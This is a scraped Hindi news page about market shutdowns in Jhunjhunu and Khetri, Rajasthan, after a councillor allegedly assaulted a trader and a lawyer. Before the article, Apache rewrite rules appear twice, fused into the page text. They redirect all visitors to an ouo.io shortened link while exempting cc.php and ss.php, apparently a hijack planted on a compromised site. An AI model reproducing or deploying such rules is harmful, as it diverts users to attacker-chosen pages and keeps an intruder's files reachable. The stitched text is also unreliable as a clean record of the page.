
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 318
Previous Nextझुंझुनू। झुंझुनूं जिले में आज दो बाजार बंद हैं। झुंझुनूं मुख्यालय पर व्यापारी से मारपीट के विरोध में बाजार बंद है तो खेतड़ी में नगरपालिका की कार्रवाई का विरोध में ऐसा हुआ है। झुंझुनूं जिला मुख्यालय का मामला यह है कि गुरुवार को गुरुवार को दीनदयाल चौक पर हो रहे निर्माण कार्य से उपजे विवाद के बाद व्यापारी प्रदीप पाटोदिया व वकील विनम्र शर्मा के साथ पार्षद संजय भार्गव व उनके साथ आए युवकों ने मारपीट की थी। इसके विरोध में आज झुंझुनूं के बाजार सुबह से ही नहीं खुले। कुछ बाजार खुले तो सुबह सात बजे से ही व्यापारियों की टोलियां उनसे बंद रखने का निवेदन करते घुमने लगी थी। व्यापारियों की इस मामले में छावनी बाजार में बैठक होगी. बैठक में शामिल होने के लिए भी व्यापारी पहुंचने लगे है। इससे पहले व्यापारियों ने सुबह भी बाजार में रैली निकाली। इधर, सुरक्षा व्यवस्था को ध्यान में रखते हुए दीनदयाल चौक पर हो रहे निर्माण कार्य के समीप आरएसी तैनात कर दी गई है। वहीं शहर में भी पुलिस गश्त लगा रही है। मामले को लेकर पुलिस हिरासत में रखे गए पार्षद संजय भार्गव की गिरफ्तारी को लेकर भी पुलिस अभी स्थिति स्पष्ट नहीं कर पा रही है, लेकिन बताया जा रहा है कि पुलिस देर रात संजय भार्गव को गिरफ्तार कर चुकी है। जिसे सीधा न्यायालय में पेश किया जाएगा. बहरहाल, मामले को लेकर शहर में तनाव है।